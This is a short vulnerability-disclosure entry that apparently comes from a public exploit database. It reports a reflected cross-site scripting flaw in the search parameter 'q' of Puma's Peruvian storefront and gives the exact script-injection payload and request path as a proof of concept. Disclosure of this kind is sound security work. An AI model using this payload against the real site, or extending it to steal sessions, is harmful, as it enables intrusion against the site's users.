Puma Peru - Reflected Cross-Site Scripting (XSS)

2024.08.27
tr kerem24 (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Puma Reflected XSS Vulnerability # Date: 2024-08-23 # Exploit Author: kerem24 # Vendor: pe.puma.com # Tested on: Microsoft Windows 11 Pro # CVE: N/A #PoC: An attacker just needs to find the vulnerable parameter (q=) and inject the JS code like: </script><script>alert(document.domain)</script> # Payload /pe/es/search?originalphrase=1&q=</script><script>alert(document.domain)</script>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top